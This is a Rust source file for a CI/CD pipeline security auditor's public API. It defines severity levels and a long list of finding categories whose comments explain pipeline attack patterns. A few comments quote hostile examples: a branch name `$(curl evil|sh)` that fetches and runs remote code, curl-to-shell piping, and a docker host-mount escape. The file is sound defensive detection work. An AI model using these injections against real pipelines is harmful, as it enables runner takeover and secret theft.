taudit_api/
lib.rs

1//! # taudit-api — stable wire types for JSON / SARIF / CloudEvents
2//!
3//! This crate owns every Rust type that appears in taudit's emitted
4//! output (JSON `taudit-report.schema.json`, JSON `authority-graph.v1.json`,
5//! SARIF `result.message.text` and `result.ruleId`, CloudEvents
6//! `tauditruleid` / `tauditfindingfingerprint` extension attributes).
7//!
8//! ## Stability promise (0.x)
9//!
10//! While at `0.x`:
11//! - Additive changes (new variants, new fields) MAY ship in any minor
12//!   bump. Consumers should pin a minor (`taudit-api = "0.1"`) and
13//!   review on each upgrade.
14//! - Breaking changes (renamed fields, removed variants, changed serde
15//!   representations) trigger a `0.{N+1}` minor bump and a CHANGELOG
16//!   migration note.
17//!
18//! At `1.0`, the promise lifts: only `2.0` permits breaking changes; all
19//! `1.x` minor bumps are additive.
20//!
21//! ## Use in downstream tooling
22//!
23//! Downstream consumers (tsign, axiom, custom SIEM integrations,
24//! Backstage plugins) should depend on `taudit-api` directly rather than
25//! `taudit-core`. `taudit-core` is workspace-internal and may break
26//! between minors; `taudit-api` is the public contract.
27//!
28//! See ADR 0001 (graph as product) and ADR 0004 (prereleases publish to
29//! crates.io).
30
31#![deny(missing_docs)]
32
33use serde::{Deserialize, Serialize, Serializer};
34use std::collections::{BTreeMap, HashMap};
35use std::path::PathBuf;
36
37// ── Severity ─────────────────────────────────────────────────────
38
39/// Severity of a finding. Ordered by `rank()` (Critical = most severe).
40#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
41#[serde(rename_all = "snake_case")]
42pub enum Severity {
43    /// Highest — exploitable now, full authority leak.
44    Critical,
45    /// Significant exposure that needs prompt action.
46    High,
47    /// Notable but bounded risk.
48    Medium,
49    /// Low priority / hygiene.
50    Low,
51    /// Informational — no direct exposure, surfaces context for triage.
52    Info,
53}
54
55impl Severity {
56    fn rank(self) -> u8 {
57        match self {
58            Severity::Critical => 0,
59            Severity::High => 1,
60            Severity::Medium => 2,
61            Severity::Low => 3,
62            Severity::Info => 4,
63        }
64    }
65}
66
67impl Ord for Severity {
68    fn cmp(&self, other: &Self) -> std::cmp::Ordering {
69        self.rank().cmp(&other.rank())
70    }
71}
72
73impl PartialOrd for Severity {
74    fn partial_cmp(&self, other: &Self) -> Option<std::cmp::Ordering> {
75        Some(self.cmp(other))
76    }
77}
78
79/// Move severity one rank toward `Info` (Critical -> High -> ... -> Info).
80/// `Info` stays `Info`. Used by both the suppression applicator and
81/// compensating-control detectors.
82///
83/// **API stability:** marked `#[doc(hidden)]` because this helper is a
84/// taudit-internal detail; downstream consumers should read `severity`
85/// directly from the JSON / SARIF / CloudEvents output.
86#[doc(hidden)]
87pub fn downgrade_severity(s: Severity) -> Severity {
88    match s {
89        Severity::Critical => Severity::High,
90        Severity::High => Severity::Medium,
91        Severity::Medium => Severity::Low,
92        Severity::Low => Severity::Info,
93        Severity::Info => Severity::Info,
94    }
95}
96
97// ── FindingCategory ──────────────────────────────────────────────
98
99/// MVP categories (1-5) are derivable from pipeline YAML alone.
100/// Stretch categories (6-9) need heuristics or metadata enrichment.
101#[allow(missing_docs)]
102#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
103#[serde(rename_all = "snake_case")]
104pub enum FindingCategory {
105    // MVP
106    AuthorityPropagation,
107    OverPrivilegedIdentity,
108    UnpinnedAction,
109    UntrustedWithAuthority,
110    ArtifactBoundaryCrossing,
111    // Stretch — implemented
112    FloatingImage,
113    LongLivedCredential,
114    /// Credential written to disk by a step (e.g. `persistCredentials: true` on a checkout).
115    /// Disk-persisted credentials are accessible to all subsequent steps and any process
116    /// with filesystem access, unlike runtime-only `HasAccessTo` authority.
117    PersistedCredential,
118    /// Dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
119    TriggerContextMismatch,
120    /// Authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
121    CrossWorkflowAuthorityChain,
122    /// Circular DelegatesTo chain — workflow calls itself transitively.
123    AuthorityCycle,
124    /// Privileged workflow (OIDC/broad identity) with no provenance attestation step.
125    UpliftWithoutAttestation,
126    /// Step writes to the environment gate ($GITHUB_ENV, pipeline variables) — authority can propagate.
127    SelfMutatingPipeline,
128    /// PR-triggered pipeline checks out the repository — attacker-controlled fork code lands on the runner.
129    CheckoutSelfPrExposure,
130    /// ADO variable group consumed by a PR-triggered job, crossing trust boundary.
131    VariableGroupInPrJob,
132    /// Self-hosted agent pool used in a PR-triggered job that also checks out the repository.
133    SelfHostedPoolPrHijack,
134    /// ADO self-hosted pool without workspace isolation (`clean: true`/`all`).
135    /// Shared self-hosted agents retain their workspace across pipeline runs.
136    /// Without `workspace: { clean: all }`, a PR build can deposit malicious
137    /// files that persist for the next (possibly privileged) pipeline run,
138    /// enabling workspace poisoning attacks.
139    SharedSelfHostedPoolNoIsolation,
140    /// Broad-scope ADO service connection reachable from a PR-triggered job without OIDC.
141    ServiceConnectionScopeMismatch,
142    /// ADO `resources.repositories[]` entry referenced by an `extends:`,
143    /// `template: x@alias`, or `checkout: alias` consumer resolves with no
144    /// `ref:` (default branch) or a mutable branch ref (`refs/heads/<name>`).
145    /// Whoever owns that branch can inject steps into the consuming pipeline.
146    TemplateExtendsUnpinnedBranch,
147    /// ADO `resources.repositories[]` entry pinned to a feature-class branch
148    /// (anything outside the `main` / `master` / `release/*` / `hotfix/*`
149    /// platform set). Feature branches typically have weaker push protection
150    /// than the trunk, so any developer with write access to that branch can
151    /// inject pipeline YAML that runs with the consumer's authority. Strictly
152    /// stronger signal than `template_extends_unpinned_branch` — co-fires.
153    TemplateRepoRefIsFeatureBranch,
154    /// Pipeline step uses an Azure VM remote-exec primitive (Set-AzVMExtension /
155    /// CustomScriptExtension, Invoke-AzVMRunCommand, az vm run-command, az vm extension set)
156    /// where the executed command line interpolates a pipeline secret or a SAS token —
157    /// pipeline-to-VM lateral movement primitive logged in plaintext to the VM and ARM.
158    VmRemoteExecViaPipelineSecret,
159    /// A SAS token freshly minted in-pipeline is interpolated into a CLI argument
160    /// (commandToExecute / scriptArguments / --arguments / -ArgumentList) instead of
161    /// passed via env var or stdin — argv ends up in /proc/*/cmdline, ETW, ARM status.
162    ShortLivedSasInCommandLine,
163    /// Pipeline secret value assigned to a shell variable inside an inline
164    /// script (`export VAR=$(SECRET)`, `$X = "$(SECRET)"`). Once the value
165    /// transits a shell variable, ADO's `$(SECRET)` log mask no longer
166    /// applies — transcripts (`Start-Transcript`, `bash -x`, terraform debug
167    /// logs) print the cleartext.
168    SecretToInlineScriptEnvExport,
169    /// Pipeline secret value written to a file under the agent workspace
170    /// (`$(System.DefaultWorkingDirectory)`, `$(Build.SourcesDirectory)`,
171    /// or relative paths) without `secureFile` task or chmod 600. The file
172    /// persists in the agent workspace and is uploaded by
173    /// `PublishPipelineArtifact` and crawlable by later steps.
174    SecretMaterialisedToWorkspaceFile,
175    /// PowerShell pulls a Key Vault secret with `-AsPlainText` (or
176    /// `ConvertFrom-SecureString -AsPlainText`, or older
177    /// `.SecretValueText` syntax) into a non-`SecureString` variable. The
178    /// value never traverses the ADO variable-group boundary, so verbose
179    /// Az/PS logging and error stack traces print the credential.
180    ///
181    /// Rule id is `keyvault_secret_to_plaintext` (single token "keyvault")
182    /// rather than the snake_case derivation `key_vault_…` — matches the
183    /// docs filename and the convention used in the corpus evidence.
184    #[serde(rename = "keyvault_secret_to_plaintext")]
185    KeyVaultSecretToPlaintext,
186    /// `terraform apply -auto-approve` against a production-named service connection
187    /// without an environment approval gate.
188    TerraformAutoApproveInProd,
189    /// `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline script —
190    /// the script can launder federated SPN/OIDC tokens into pipeline variables.
191    AddSpnWithInlineScript,
192    /// A `type: string` pipeline parameter (no `values:` allowlist) is interpolated
193    /// via `${{ parameters.X }}` into an inline shell/PowerShell script body —
194    /// shell injection vector for anyone with "queue build".
195    ParameterInterpolationIntoShell,
196    /// A `run:` block fetches a remote script from a mutable URL (`refs/heads/`,
197    /// `/main/`, `/master/`) and pipes it directly to a shell interpreter
198    /// (`curl … | bash`, `wget … | sh`, `bash <(curl …)`, `deno run https://…`).
199    /// Whoever controls that URL's content controls execution on the runner.
200    RuntimeScriptFetchedFromFloatingUrl,
201    /// Workflow trigger combines high-authority PR events
202    /// (`pull_request_target`, `issue_comment`, or `workflow_run`) with a step
203    /// whose `uses:` ref is a mutable branch/tag (not a 40-char SHA). Compromise
204    /// of the action's default branch yields full repo write on the target repo.
205    PrTriggerWithFloatingActionRef,
206    /// A `workflow_run`-triggered workflow captures a value from an external
207    /// API response (`gh pr view`, `gh api`, `curl api.github.com`) and writes
208    /// it into `$GITHUB_ENV`/`$GITHUB_OUTPUT`/`$GITHUB_PATH` without sanitisation.
209    /// A poisoned API field (branch name, title) injects environment variables
210    /// into every subsequent step in the same job.
211    UntrustedApiResponseToEnvSink,
212    /// A `pull_request`-triggered workflow logs into a container registry via a
213    /// floating (non-SHA-pinned) login action. The compromised action receives
214    /// OIDC tokens or registry credentials, and the workflow then pushes a
215    /// PR-controlled image to a shared registry.
216    PrBuildPushesImageWithFloatingCredentials,
217    /// First-party step writes a Secret/Identity-derived value into the
218    /// `$GITHUB_ENV` gate (or pipeline-variable equivalent) and a *later*
219    /// step in the same job that runs in `Untrusted` or `ThirdParty` trust
220    /// zone reads from the runner-managed env (`${{ env.X }}`). The two
221    /// component rules — `self_mutating_pipeline` (writer) and
222    /// `untrusted_with_authority` (consumer) — each see only half the
223    /// chain and emit no finding for the laundered consumer; this rule
224    /// closes the composition gap that R2 attack #3 exploited.
225    SecretViaEnvGateToUntrustedConsumer,
226    /// Positive-invariant rule (GHA): the workflow declares neither a
227    /// top-level nor a per-job `permissions:` block, leaving GITHUB_TOKEN at
228    /// its broad platform default. Fires once per workflow file.
229    NoWorkflowLevelPermissionsBlock,
230    /// Positive-invariant rule (ADO): a job referencing a production-named
231    /// service connection has no `environment:` binding, so it bypasses the
232    /// only ADO-side approval gate regardless of whether `-auto-approve` is
233    /// present. Strictly broader than `terraform_auto_approve_in_prod`.
234    ProdDeployJobNoEnvironmentGate,
235    /// Positive-invariant rule (cross-platform): a long-lived static
236    /// credential is in scope but the workflow does not currently use any
237    /// OIDC identity even though the target cloud supports federation.
238    /// Advisory uplift on top of `long_lived_credential` that wires the
239    /// existing `Recommendation::FederateIdentity` variant.
240    LongLivedSecretWithoutOidcRecommendation,
241    /// Positive-invariant rule (GHA): a PR-triggered workflow has multiple
242    /// privileged jobs where SOME have the standard fork-check `if:` and
243    /// OTHERS do not. Detects an intra-file inconsistency in defensive
244    /// posture — the org has the right instinct but applied it unevenly.
245    PullRequestWorkflowInconsistentForkCheck,
246    /// Positive-invariant rule (GitLab): a job with a production-named
247    /// `environment:` binding has no `rules:` / `only:` clause restricting
248    /// it to protected branches. Deploy job runs (or attempts to run) on
249    /// every pipeline trigger.
250    GitlabDeployJobMissingProtectedBranchOnly,
251    /// Two-step ADO chain: an inline script captures a `terraform output`
252    /// value (literal `terraform output` CLI invocation or a `$env:TF_OUT_*` /
253    /// `$TF_OUT_*` env var sourced from a Terraform CLI task) AND emits a
254    /// `##vso[task.setvariable variable=X;...]` directive setting that
255    /// captured value into pipeline variable `X`. A subsequent step in the
256    /// same job then expands `$(X)` in shell-expansion position
257    /// (`bash -c "..."`, `eval`, command substitution `$(...)`, PowerShell
258    /// `-split` / `Invoke-Command` / `Invoke-Expression`/`iex`, or as an
259    /// unquoted command word). The `task.setvariable` hop launders
260    /// attacker-controlled Terraform state — sourced from a remote backend
261    /// (S3 bucket, Azure Storage) that often has weaker access controls than
262    /// the pipeline itself — through pipeline-variable space and into a
263    /// shell interpreter.
264    TerraformOutputViaSetvariableShellExpansion,
265    /// GHA workflow declares a high-blast-radius trigger (`issue_comment`,
266    /// `pull_request_review`, `pull_request_review_comment`, `workflow_run`)
267    /// alongside write permissions or non-`GITHUB_TOKEN` secrets. Closes the
268    /// gap left by `trigger_context_mismatch` only firing on
269    /// `pull_request_target` / ADO `pr`.
270    RiskyTriggerWithAuthority,
271    /// A `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
272    /// OIDC-bearing step output, or has a credential-shaped name. Job outputs
273    /// flow unmasked through `needs.<job>.outputs.*` and are written to the
274    /// run log — masking is heuristic, never authoritative.
275    SensitiveValueInJobOutput,
276    /// A `workflow_dispatch.inputs.*` value flows into `curl` / `wget` /
277    /// `gh api` / a `run:` URL / `actions/checkout` `ref:`. Anyone with
278    /// dispatch permission can pivot the run to attacker-controlled refs or
279    /// hosts.
280    ManualDispatchInputToUrlOrCommand,
281    /// A reusable workflow call uses `secrets: inherit` while the caller is
282    /// triggered by an attacker-influenced event (`pull_request`,
283    /// `pull_request_target`, `issue_comment`, `workflow_run`). The whole
284    /// caller secret bag forwards to the callee regardless of what the callee
285    /// actually consumes — every transitive `uses:` in the called workflow
286    /// inherits the same scope.
287    SecretsInheritOverscopedPassthrough,
288    /// A `workflow_run`- or `pull_request_target`-triggered consumer
289    /// downloads an artifact from the originating run AND interprets that
290    /// artifact's content into a privileged sink (post-to-comment, write to
291    /// `$GITHUB_ENV`, `eval`, …). The producer ran in PR context, so a
292    /// malicious PR can write arbitrary content into the artifact while the
293    /// consumer holds upstream-repo authority.
294    UnsafePrArtifactInWorkflowRunConsumer,
295    /// A GitHub Actions `run:` block (or `actions/github-script` `script:` body)
296    /// interpolates an attacker-controllable expression — `${{ github.event.* }}`,
297    /// `${{ github.head_ref }}`, or `${{ inputs.* }}` from a privileged trigger
298    /// (`workflow_dispatch` / `workflow_run` / `issue_comment`) — directly into
299    /// the script text without first binding through an `env:` indirection.
300    /// Classic GitHub Actions remote-code-execution pattern.
301    ScriptInjectionViaUntrustedContext,
302    /// A workflow that holds non-`GITHUB_TOKEN` secrets or non-default
303    /// write permissions includes a step that uses an interactive debug action
304    /// (mxschmitt/action-tmate, lhotari/action-upterm, actions/tmate, …).
305    /// A maintainer flipping `debug_enabled=true` publishes the runner's full
306    /// environment over an external SSH endpoint.
307    InteractiveDebugActionInAuthorityWorkflow,
308    /// An `actions/cache` step keys the cache on a PR-derived expression
309    /// (`github.head_ref`, `github.event.pull_request.head.ref`, `github.actor`)
310    /// in a workflow that ALSO runs on `push: branches: [main]` — a PR can
311    /// poison the cache that the default-branch build later restores.
312    PrSpecificCacheKeyInDefaultBranchConsumer,
313    /// A `run:` step uses `gh ` / `gh api` with the default `GITHUB_TOKEN` to
314    /// perform a write-class action (`pr merge`, `release create/upload`,
315    /// `api -X POST/PATCH/PUT/DELETE` to `/repos/.../{contents,releases,actions/secrets,environments}`)
316    /// inside a workflow triggered by `pull_request`, `issue_comment`, or
317    /// `workflow_run` — runtime privilege escalation that static permission
318    /// checks miss.
319    GhCliWithDefaultTokenEscalating,
320    /// Attacker-controlled GitHub context is interpolated directly into a
321    /// privileged shell/script step that holds secrets, OIDC, or write token.
322    GhaScriptInjectionToPrivilegedShell,
323    /// Workflow-run or pull-request-target consumer downloads a PR artifact,
324    /// interprets it, and holds write-token or non-default authority.
325    GhaWorkflowRunArtifactPoisoningToPrivilegedConsumer,
326    /// Mutable remote script execution happens inside a job with secrets,
327    /// OIDC, cloud, registry, package, signing, or write-token authority.
328    GhaRemoteScriptInAuthorityJob,
329    /// A GitHub Actions shell step embeds a PAT/token in a git remote URL and
330    /// performs a write-capable git operation.
331    GhaPatRemoteUrlWrite,
332    /// An issue-comment workflow turns comment body or issue metadata into a
333    /// command path while write-token authority is present.
334    GhaIssueCommentCommandToWriteToken,
335    /// PR-triggered workflow builds and pushes a container image while registry
336    /// or cloud publish authority is present.
337    GhaPrBuildPushesPublishableImage,
338    /// workflow_dispatch input selects the checkout ref in a workflow with
339    /// write-token, secret, or deploy authority.
340    GhaManualDispatchRefToPrivilegedCheckout,
341    /// GitLab CI `$CI_JOB_TOKEN` (or `gitlab-ci-token:$CI_JOB_TOKEN`) used as a
342    /// bearer credential against an external HTTP API or fed to `docker login`
343    /// for `registry.gitlab.com`. CI_JOB_TOKEN's default scope (registry write,
344    /// package upload, project read) means a poisoned MR job that emits the
345    /// token to a webhook can pivot to package/registry pushes elsewhere.
346    CiJobTokenToExternalApi,
347    /// GitLab CI `id_tokens:` declares an `aud:` audience that is reused across
348    /// MR-context and protected-context jobs (no audience separation), or is a
349    /// wildcard / multi-cloud broker URL. The audience is what trades for
350    /// downstream cloud creds — a single shared `aud` means any job that
351    /// compromises the token assumes the most-privileged role any other job
352    /// uses.
353    IdTokenAudienceOverscoped,
354    /// Direct shell interpolation of attacker-controlled GitLab predefined
355    /// vars (`$CI_COMMIT_BRANCH`, `$CI_COMMIT_REF_NAME`, `$CI_COMMIT_TAG`,
356    /// `$CI_COMMIT_MESSAGE`, `$CI_COMMIT_TITLE`, `$CI_MERGE_REQUEST_TITLE`,
357    /// `$CI_MERGE_REQUEST_DESCRIPTION`,
358    /// `$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`, `$CI_COMMIT_AUTHOR`) into
359    /// `script:` / `before_script:` / `after_script:` / `environment:url:`
360    /// without single-quote isolation. A branch named `` $(curl evil|sh) ``
361    /// executes inside the runner. GitLab generalisation of the GHA
362    /// `script_injection_via_untrusted_context` class.
363    UntrustedCiVarInShellInterpolation,
364    /// A GitLab `include:` references (a) a `remote:` URL pointing at a
365    /// branch (`/-/raw/<branch>/...`), (b) a `project:` with `ref:` resolving
366    /// to a mutable branch name (main/master/develop), or (c) an include with
367    /// no `ref:` at all (defaults to HEAD). Whoever owns that branch can
368    /// backdoor every consumer's pipeline silently — included YAML executes
369    /// with the consumer's secrets and CI_JOB_TOKEN.
370    UnpinnedIncludeRemoteOrBranchRef,
371    /// A GitLab job declares a `services: [docker:*-dind]` sidecar AND holds
372    /// at least one non-CI_JOB_TOKEN secret (registry creds, deploy keys,
373    /// signing keys, vault id_tokens). docker-in-docker exposes the full
374    /// Docker socket inside the job container — a malicious build step can
375    /// `docker run -v /:/host` from inside dind and read the runner host
376    /// filesystem (other jobs' artifacts, cached creds).
377    DindServiceGrantsHostAuthority,
378    /// A GitLab job whose name or `extends:` matches scanner patterns
379    /// (`sast`, `dast`, `secret_detection`, `dependency_scanning`,
380    /// `container_scanning`, `gitleaks`, `trivy`, `grype`, `semgrep`, etc.)
381    /// runs with `allow_failure: true` AND has no `rules:` clause that
382    /// surfaces the failure. The pipeline goes green even when the scan
383    /// errors out — silent-pass is worse than no scan because reviewers trust
384    /// the badge.
385    SecurityJobSilentlySkipped,
386    /// A GitLab `trigger:` job (downstream / child pipeline) runs in
387    /// `merge_request_event` context OR uses `include: artifact:` from a
388    /// previous job (dynamic child pipeline). Dynamic child pipelines are a
389    /// code-injection sink — anything the build step writes to the artifact
390    /// runs as a real pipeline with the parent project's secrets.
391    ChildPipelineTriggerInheritsAuthority,
392    /// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
393    /// only, or `$CI_COMMIT_REF_SLUG` without a `policy: pull` restriction.
394    /// Caches are stored per-runner keyed by `key:`; a poisoned MR can push a
395    /// malicious `node_modules/` cache that the next default-branch job
396    /// downloads and executes during `npm install`.
397    CacheKeyCrossesTrustBoundary,
398    /// A CI script constructs an HTTPS git URL with embedded credentials
399    /// (`https://user:$TOKEN@host/...`) before invoking `git clone`,
400    /// `git push`, or `git remote set-url`. The credential is exposed
401    /// in the process argv (visible to `ps`, `/proc/*/cmdline`), persists
402    /// in `.git/config` for the rest of the job, and may be uploaded as
403    /// part of any artifact that bundles the workspace.
404    PatEmbeddedInGitRemoteUrl,
405    /// A CI job triggers a different project's pipeline via the GitLab
406    /// REST API using `CI_JOB_TOKEN` and forwards user-influenced variables
407    /// through the `variables[KEY]=value` query/form parameter. The
408    /// downstream project's security depends on the trust contract between
409    /// the two projects — variable values flowing across that boundary
410    /// constitute a cross-project authority bridge.
411    CiTokenTriggersDownstreamWithVariablePassthrough,
412    /// A GitLab job emits an `artifacts.reports.dotenv: <file>` artifact
413    /// whose contents become pipeline variables for any consumer linked
414    /// via `needs:` or `dependencies:`. A consumer in a later stage that
415    /// targets a production-named environment inherits those variables
416    /// transparently — no explicit download is visible at the job level.
417    /// When the producer reads attacker-influenced inputs (branch names,
418    /// commit messages), the dotenv flow is a covert privilege escalation
419    /// channel into the deployment job.
420    DotenvArtifactFlowsToPrivilegedDeployment,
421    /// ADO inline script sets a sensitive-named pipeline variable via
422    /// `##vso[task.setvariable variable=<NAME>]` with `issecret=false` or
423    /// without the `issecret` flag at all. Without `issecret=true` the
424    /// variable value is printed in plaintext to the pipeline log and is
425    /// not masked in downstream step output.
426    SetvariableIssecretFalse,
427    /// A GHA `uses:` action reference contains a non-ASCII character —
428    /// possible Unicode confusable / homoglyph impersonating a trusted
429    /// action (e.g. Cyrillic `a` instead of Latin `a`, or U+2215
430    /// DIVISION SLASH instead of U+002F SOLIDUS).
431    HomoglyphInActionRef,
432    /// A GitHub Actions step mutates `GITHUB_PATH` before a later known
433    /// helper-delegating action passes sensitive material to a bare helper via
434    /// command-line arguments. The prior step can select the helper that
435    /// receives later action-only authority.
436    GhaHelperPathSensitiveArgv,
437    /// A GitHub Actions step mutates `GITHUB_PATH` before a later known
438    /// helper-delegating action passes sensitive material to a bare helper over
439    /// stdin, such as Docker login passwords or Wrangler secret payloads.
440    GhaHelperPathSensitiveStdin,
441    /// A GitHub Actions step mutates `GITHUB_PATH` before a later known
442    /// helper-delegating action runs a bare helper with sensitive environment
443    /// values in scope.
444    GhaHelperPathSensitiveEnv,
445    /// A GitHub Actions post action recomputes cleanup targets from ambient
446    /// environment rather than an action-owned state channel, allowing later
447    /// `GITHUB_ENV` writes to retarget cleanup.
448    GhaPostAmbientEnvCleanupPath,
449    /// A GitHub Actions action mints or exchanges later credentials and then
450    /// delegates them to a PATH-resolved helper.
451    GhaActionMintedSecretToHelper,
452    /// A GitHub Actions action invokes a security-sensitive helper by bare
453    /// name after an earlier same-job `GITHUB_PATH` mutation.
454    GhaHelperUntrustedPathResolution,
455    /// A GitHub Actions login action exposes credential material as step
456    /// outputs after helper login, making cross-job propagation easy to miss.
457    GhaSecretOutputAfterHelperLogin,
458    /// Umbrella GHA authority-confusion classifier: an earlier same-job
459    /// `GITHUB_PATH` mutation precedes a later helper action that receives or
460    /// mints sensitive authority.
461    LaterSecretMaterializedAfterPathMutation,
462    /// `actions/setup-node` cache mode resolves npm/pnpm/yarn helpers after an
463    /// earlier same-job `GITHUB_PATH` mutation.
464    GhaSetupNodeCacheHelperPathHandoff,
465    /// `actions/setup-python` cache mode resolves pip/pipenv/poetry helpers
466    /// after an earlier same-job `GITHUB_PATH` mutation.
467    GhaSetupPythonCacheHelperPathHandoff,
468    /// `actions/setup-python` pip-install mode runs pip while inheriting
469    /// ambient credentials or cloud authority.
470    GhaSetupPythonPipInstallAuthorityEnv,
471    /// `actions/setup-go` cache mode resolves Go helpers after an earlier
472    /// same-job `GITHUB_PATH` mutation.
473    GhaSetupGoCacheHelperPathHandoff,
474    /// `docker/setup-qemu-action` invokes Docker/QEMU helper flow in a job that
475    /// already has registry authority or private-image context.
476    GhaDockerSetupQemuPrivilegedDockerHelper,
477    /// Tool-installer action is followed by shell use of the installed helper
478    /// while deploy/signing authority is in scope.
479    GhaToolInstallerThenShellHelperAuthority,
480    /// Shell command sequence concentrates publish, deploy, signing, registry,
481    /// or release authority in a workflow step.
482    GhaWorkflowShellAuthorityConcentration,
483    /// A token-bearing action boundary invokes bare download or verification
484    /// helpers after an earlier same-job `GITHUB_PATH` mutation.
485    GhaActionTokenEnvBeforeBareDownloadHelper,
486    /// A post action can retarget cache-save cleanup from ambient action input
487    /// or environment state after a later same-job mutation.
488    GhaPostActionInputRetargetToCacheSave,
489    /// `hashicorp/setup-terraform` wrapper outputs are consumed by a later
490    /// step, potentially moving sensitive Terraform stdout/stderr material.
491    GhaTerraformWrapperSensitiveOutput,
492    /// A workflow or composite-style shell step invokes a bare helper after
493    /// mutable PATH setup while secret environment authority is in scope.
494    GhaCompositeBareHelperAfterPathInstallWithSecretEnv,
495    /// Pulumi action/CLI authority is delegated to a PATH-resolved `pulumi`
496    /// helper after an earlier same-job `GITHUB_PATH` mutation.
497    GhaPulumiPathResolvedCliWithAuthority,
498    /// PyPI publish authority or OIDC publishing capability reaches PyPI
499    /// helper resolution after an earlier same-job `GITHUB_PATH` mutation.
500    GhaPypiPublishOidcAfterPathMutation,
501    /// Changesets publish authority reaches package-manager helper resolution
502    /// after an earlier same-job `GITHUB_PATH` mutation.
503    GhaChangesetsPublishCommandWithAuthority,
504    /// RubyGems release token or OIDC authority reaches gem/bundle/git helper
505    /// resolution after an earlier same-job `GITHUB_PATH` mutation.
506    GhaRubygemsReleaseGitTokenAndOidcHelper,
507    /// A local/composite action entrypoint can be path-shadowed before it runs
508    /// with secret environment authority.
509    GhaCompositeEntrypointPathShadowWithSecretEnv,
510    /// Docker Buildx setup/build-push authority reaches Docker/buildx helpers
511    /// after an earlier same-job `GITHUB_PATH` mutation.
512    GhaDockerBuildxAuthorityPathHandoff,
513    /// Google deploy actions receive generated Google/cloud authority before
514    /// delegating to `gcloud` after mutable PATH setup.
515    GhaGoogleDeployGcloudCredentialPath,
516    /// Datadog test visibility setup runs installer/helper flow with API key
517    /// authority after mutable PATH setup.
518    GhaDatadogTestVisibilityInstallerAuthority,
519    /// Kubernetes or Helm helper commands run with kubeconfig/deploy authority
520    /// after mutable PATH setup.
521    GhaKubernetesHelperKubeconfigAuthority,
522    /// Azure companion helpers such as sqlcmd, SqlPackage, kubelogin, or pwsh
523    /// run with Azure login authority after mutable PATH setup.
524    GhaAzureCompanionHelperAuthority,
525    /// `peter-evans/create-pull-request` receives PR token authority after an
526    /// earlier same-job `GITHUB_PATH` mutation and delegates to `git`.
527    GhaCreatePrGitTokenPathHandoff,
528    /// `crazy-max/ghaction-import-gpg` receives GPG private key/passphrase
529    /// material after an earlier same-job `GITHUB_PATH` mutation.
530    GhaImportGpgPrivateKeyHelperPath,
531    /// `webfactory/ssh-agent` receives SSH private key material after an
532    /// earlier same-job `GITHUB_PATH` mutation.
533    GhaSshAgentPrivateKeyToPathHelper,
534    /// `apple-actions/import-codesign-certs` receives macOS P12/keychain
535    /// material after an earlier same-job `GITHUB_PATH` mutation.
536    GhaMacosCodesignCertSecurityPath,
537    /// Pages deploy actions compose token/deploy-key Git authority after an
538    /// earlier same-job `GITHUB_PATH` mutation.
539    GhaPagesDeployTokenUrlToGitHelper,
540    /// A `workflow_run` / `pull_request_target` consumer downloads a
541    /// PR-context artifact, then uses artifact-derived PR metadata near a
542    /// write-class GitHub API/comment sink.
543    GhaWorkflowRunArtifactMetadataToPrivilegedApi,
544    /// A `workflow_run` / `pull_request_target` consumer downloads a
545    /// PR-context artifact, reads report content, and posts it to a PR or
546    /// review comment sink.
547    GhaWorkflowRunArtifactReportToPrComment,
548    /// A `workflow_run` / `pull_request_target` consumer downloads a
549    /// PR-context artifact and feeds artifact-derived data into a build-scan
550    /// or Develocity publication path.
551    GhaWorkflowRunArtifactToBuildScanPublish,
552    /// A mutable remote script is executed before a publish/deploy/release
553    /// sink in the same authority-bearing GitHub Actions job.
554    GhaFloatingRemoteScriptBeforePublishSink,
555    /// A token-bearing Git remote URL is used while trace/debug/process
556    /// exposure is enabled, making the token observable through argv, logs, or
557    /// process inspection.
558    GhaTokenRemoteUrlWithTraceOrProcessExposure,
559    /// Earlier same-job env state redirects a credential helper's config file
560    /// before later cloud, registry, package, or signing authority is present.
561    GhaEnvCredentialHelperConfigRedirectBeforeAuthority,
562    /// Earlier same-job `NODE_OPTIONS` startup injection reaches a later
563    /// Node/npm/npx/yarn authority boundary.
564    GhaEnvNodeOptionsCodeInjectionBeforeNodeAuthority,
565    /// Earlier same-job dynamic-loader env state reaches a later
566    /// credential-bearing helper boundary.
567    GhaEnvDyldOrLdLibraryPathBeforeCredentialHelper,
568    /// A reusable workflow accepts caller-controlled container image input
569    /// while secrets are inherited across the caller/callee boundary.
570    GhaWorkflowCallContainerImageInputSecretsInherit,
571    /// A reusable workflow accepts caller-controlled runner labels while
572    /// secrets, OIDC, or write-token authority is available.
573    GhaWorkflowCallRunnerLabelInputPrivilegeEscalation,
574    /// A job runs in an attacker-influenced container image while secret or
575    /// token authority is present in that job.
576    GhaContainerImageAttackerInfluencedWithSecretEnv,
577    /// Attestation action signs a caller/step-provided subject digest rather
578    /// than a digest it independently computed from a workspace file.
579    GhaAttestationSubjectDigestFromStepOutputUnverified,
580    /// PR-reachable workflow signs files selected by a workspace glob.
581    GhaAttestationSubjectPathWorkspaceGlobWithPrTrigger,
582    /// Attestation reachability is gated by a workspace/config-derived output.
583    GhaAttestationConfigDrivenGateFromWorkspaceFile,
584    /// PR, issue, or comment text is sent to an external telemetry sink.
585    GhaTelemetryPrOrIssueTextToExternalSink,
586    /// Debug logging is enabled while secret-bearing environment is present.
587    GhaTelemetryDebugFlagWithSecretEnv,
588    /// Autonomous coding agent receives untrusted event text while mutation
589    /// authority is available.
590    GhaTelemetryAutonomousAgentInputFromUntrustedEvent,
591    /// Workflow-run artifact bytes are published to blob/object storage under
592    /// token authority.
593    GhaWorkflowRunArtifactToBlobStorageToken,
594    /// Workflow-run artifact or failure data reaches an autonomous agent before
595    /// a GitHub or git mutation step.
596    GhaApiWorkflowRunArtifactToAutonomousAgentToGitPush,
597    /// PR-reachable npm-family install runs manifest lifecycle hooks while
598    /// token, secret, OIDC, registry, cloud, or write authority is present.
599    GhaManifestNpmLifecycleHookPrTriggerWithToken,
600    /// PR-reachable Python build/install path executes project manifest code
601    /// while publish credentials or OIDC authority are present.
602    GhaManifestPythonMBuildWithPrCredentials,
603    /// PR-reachable Cargo compile path can run build.rs/proc-macro code while
